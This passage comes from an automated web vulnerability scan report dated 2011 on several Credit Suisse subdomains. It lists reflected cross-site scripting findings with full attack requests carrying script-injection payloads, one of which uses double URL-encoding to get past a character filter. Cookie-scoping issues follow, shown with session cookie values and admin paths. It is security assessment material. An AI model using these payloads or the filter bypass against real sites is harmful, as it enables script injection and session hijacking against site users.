Last-Modified: Mon, 19 Sep 2011 14:35:05 GMT
expires: Mon, 19 Sep 2011 15:35:05 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/error/index.cfm?b3d39"><script>alert(1)</script>1dcfbcc5044=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.40. https://responsibility.credit-suisse.com/app/newsletter/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/newsletter/index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 216bf"><script>alert(1)</script>ac4bef5a73d was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /app/newsletter/index.cfm?fuseaction=OpenNewsletter216bf"><script>alert(1)</script>ac4bef5a73d&coid=127170&ngoid=54001&lang=&lang=EN HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:41:12 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:41:12 GMT
expires: Mon, 19 Sep 2011 15:41:12 GMT
Content-Language: it-CH
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/newsletter/index.cfm?fuseaction=OpenNewsletter216bf"><script>alert(1)</script>ac4bef5a73d&amp;coid=127170&amp;ngoid=54001&amp;lang=&amp;l#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.41. https://responsibility.credit-suisse.com/app/newsletter/index.cfm [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/newsletter/index.cfm

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea2de"><script>alert(1)</script>6b65afdd599 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /app/newsletter/index.cfm?fuseaction=OpenNewsletter&coid=127170&ngoid=54001&lang=&lang=ENea2de"><script>alert(1)</script>6b65afdd599 HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:43:29 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:43:29 GMT
expires: Mon, 19 Sep 2011 15:43:29 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/newsletter/index.cfm?fuseaction=OpenNewsletter&amp;coid=127170&amp;ngoid=54001&amp;lang=&amp;lea2de"><script>alert(1)</script>6b65afdd599#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.42. https://responsibility.credit-suisse.com/app/newsletter/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/newsletter/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24b04"><script>alert(1)</script>6b2e034eefa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /app/newsletter/index.cfm?fuseaction=OpenNewsletter&coid=127170&ngoid=54001&lang=&lang=EN&24b04"><script>alert(1)</script>6b2e034eefa=1 HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:43:40 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:43:40 GMT
expires: Mon, 19 Sep 2011 15:43:40 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/newsletter/index.cfm?fuseaction=OpenNewsletter&amp;coid=127170&amp;ngoid=54001&amp;lang=&amp;l&amp;24b04"><script>alert(1)</script>6b2e034eefa=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.43. https://responsibility.credit-suisse.com/app/newsletter/index.cfm [ngoid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/newsletter/index.cfm

Issue detail

The value of the ngoid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4461"><script>alert(1)</script>7cc17444aa4 was submitted in the ngoid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /app/newsletter/index.cfm?fuseaction=OpenNewsletter&coid=127170&ngoid=54001a4461"><script>alert(1)</script>7cc17444aa4&lang=&lang=EN HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:43:19 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:43:19 GMT
expires: Mon, 19 Sep 2011 15:43:19 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/newsletter/index.cfm?fuseaction=OpenNewsletter&amp;coid=127170&amp;ngoid=54001a4461"><script>alert(1)</script>7cc17444aa4&amp;lang=&amp;l#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.44. https://responsibility.credit-suisse.com/index.cfm [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /index.cfm

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fab3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efa30c48e95 was submitted in the page parameter. This input was echoed as 4fab3"><script>alert(1)</script>fa30c48e95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.cfm?fuseaction=setLang&lang=IT&page=%2Fapp%2Farticle%2Findex%2Ecfm?fuseaction%3DOpenArticle%26aoid%3D319249%26coid%3D64291%26lang%3DEN%26bhjs%3D%2D14fab3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efa30c48e95 HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:40:22 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:40:22 GMT
expires: Mon, 19 Sep 2011 15:40:22 GMT
Content-Language: it-CH
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&amp;aoid=319249&amp;coid=64291&amp;bhjs=-14fab3"><script>alert(1)</script>fa30c48e95&amp;lang=IT#MID" title="Direttamente al contenuto" accesskey="1">
...[SNIP]...

2. SSL cookie without secure flag set  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /jamez_customtags/control/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /jamez_customtags/control/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:38:49 GMT
Server: Apache
server-error: true
pragma: no-cache
location: /jamez_customtags/default.cfm?CFID=38646949&CFTOKEN=99323788
expires: now()
cache-control: no-cache, no-store, must-revalidate
Set-Cookie: CFID=38646949;path=/
Set-Cookie: CFTOKEN=99323788;path=/
Connection: close
Content-Type: text/html; charset=UTF-8


3. Cookie scoped to parent domain  previous  next
There are 55 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


3.1. https://emagazine.credit-suisse.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://emagazine.credit-suisse.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: emagazine.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:46:32 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:32 GMT
location: /app/home/index.cfm?fuseaction=OpenHome&lang=EN
expires: Mon, 19 Sep 2011 15:46:32 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.2. https://emagazine.credit-suisse.com/app/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://emagazine.credit-suisse.com
Path:   /app/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/ HTTP/1.1
Host: emagazine.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:46:30 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:30 GMT
location: /index.cfm?CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:46:30 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.3. https://emagazine.credit-suisse.com/app/home/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://emagazine.credit-suisse.com
Path:   /app/home/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/home/ HTTP/1.1
Host: emagazine.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:30 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:30 GMT
expires: Mon, 19 Sep 2011 15:46:30 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...

3.4. https://emagazine.credit-suisse.com/app/home/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://emagazine.credit-suisse.com
Path:   /app/home/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/home/index.cfm?fuseaction=OpenSponsoring&lang=EN HTTP/1.1
Host: emagazine.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:46:30 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:30 GMT
location: https://sponsorship.credit-suisse.com/app/home/index.cfm?fuseaction=OpenSponsoring&lang=EN
expires: Mon, 19 Sep 2011 15:46:30 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.5. https://emagazine.credit-suisse.com/app/newsletter/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://emagazine.credit-suisse.com
Path:   /app/newsletter/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/newsletter/index.cfm HTTP/1.1
Host: emagazine.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:46:31 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:31 GMT
location: /index.cfm?fuseaction=OpenNewsletter&CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:46:31 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.6. https://infocus.credit-suisse.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:35:19 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:35:20 GMT
location: /app/home/index.cfm?fuseaction=OpenHome&lang=EN
expires: Mon, 19 Sep 2011 15:35:20 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.7. https://infocus.credit-suisse.com/app/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:34:42 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:34:42 GMT
location: /index.cfm?CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:34:42 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.8. https://infocus.credit-suisse.com/app/_admin/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/_admin/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/_admin/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:34:55 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:34:56 GMT
location: https://admin.emagazine.ch/app/_admin/index.cfm?client=emagazine
expires: Mon, 19 Sep 2011 15:34:56 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.9. https://infocus.credit-suisse.com/app/_control/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/_control/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/_control/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:34:54 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:34:54 GMT
expires: Mon, 19 Sep 2011 15:34:54 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>EMAGAZINE [ ADMIN MODE ]</title>
<link rel="STYLESHEET" type="text/css" href="https://admin.emagazine.
...[SNIP]...

3.10. https://infocus.credit-suisse.com/app/_control/act_login_adminmode.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/_control/act_login_adminmode.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/_control/act_login_adminmode.cfm?lang=EN&client=&doid= HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:54 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:54 GMT
expires: Mon, 19 Sep 2011 15:38:54 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- OMNITURE ON//-->


<!-- SiteCatalyst code version: H.22.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->

...[SNIP]...

3.11. https://infocus.credit-suisse.com/app/_gen/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/_gen/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/_gen/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:35:01 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:35:02 GMT
expires: Mon, 19 Sep 2011 15:35:02 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8

<script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<script type="text/javascript">/* <![CDATA[ */
   if (wind
...[SNIP]...

3.12. https://infocus.credit-suisse.com/app/_gen/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/_gen/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/_gen/index.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:39:01 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:39:01 GMT
expires: Mon, 19 Sep 2011 15:39:01 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8

<script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<script type="text/javascript">/* <![CDATA[ */
   if (wind
...[SNIP]...

3.13. https://infocus.credit-suisse.com/app/_return/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/_return/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/_return/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/robots.txt
